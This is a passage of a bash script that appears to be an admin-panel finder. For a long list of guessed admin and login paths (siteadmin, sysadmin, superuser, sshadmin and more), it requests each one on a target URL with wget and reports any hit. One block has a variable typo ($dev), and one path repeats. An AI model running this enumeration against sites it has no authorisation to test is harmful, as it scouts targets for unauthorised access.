then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/rcjakar/admin/login.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/rcjakar/admin/login.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/rcLogin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/registration"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/relogin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/relogin.htm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/relogin.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/relogin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/root"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/roots"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/saff"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/secret"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/secret"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/secure"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/security"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/senha"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/senhas"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/ser.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/server"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/Server.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/Server.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/Server.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/server_admin_small"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/ServerAdministrator"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sff"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/showlogin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sign_in.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sign_in.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sign_in"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/signin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sign-in.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/signin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sign-in.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/signin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sign-in"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/simpleLogin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/Sing"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sistema"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/siteadmin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/siteadmin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/siteadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/siteadmin/index.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/siteadmin/index.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/siteadmin/index.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/siteadmin/index.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/siteadmin/index.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/siteadmin/login.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/siteadmin/login.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/siteadmin/login.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/siteadmin/login.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/siteadmin/login.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/siteadmin/login.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/smblogin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sql-admin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/ss_vms_admin_sm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sshadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/staradmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sub-login"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/super_indexasp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/super_indexphp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/super_loginasp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/super_loginphp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/super1"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/super1asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/super1php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/Super-Admin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/superasp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/superman"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/supermanagerasp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/supermanagerphp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/supermanasp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/supermanphp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/superphp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/superuser.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/superuser.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/superuser"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/superuserasp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/superuserphp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/supervise"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/supervise/Loginasp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/supervise/Loginphp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/supervisor"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/support_login"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sysadm.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sysadm.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sysadm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sysadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sys-admin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sysadmin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sysadmin.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sysadmin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/SysAdmin2"
c=$b$dev
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sysadmins"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/system_administration"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/system-administration"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/typo3"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/ur-admin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/ur-admin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/ur-admin.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/ur-admin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/usager"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/user.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/user.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/user.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/user.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/user.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/user.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/user.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/user"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/useradmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/UserLogin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/userlogin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/userlogin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/username"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/users.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/users.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/users"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
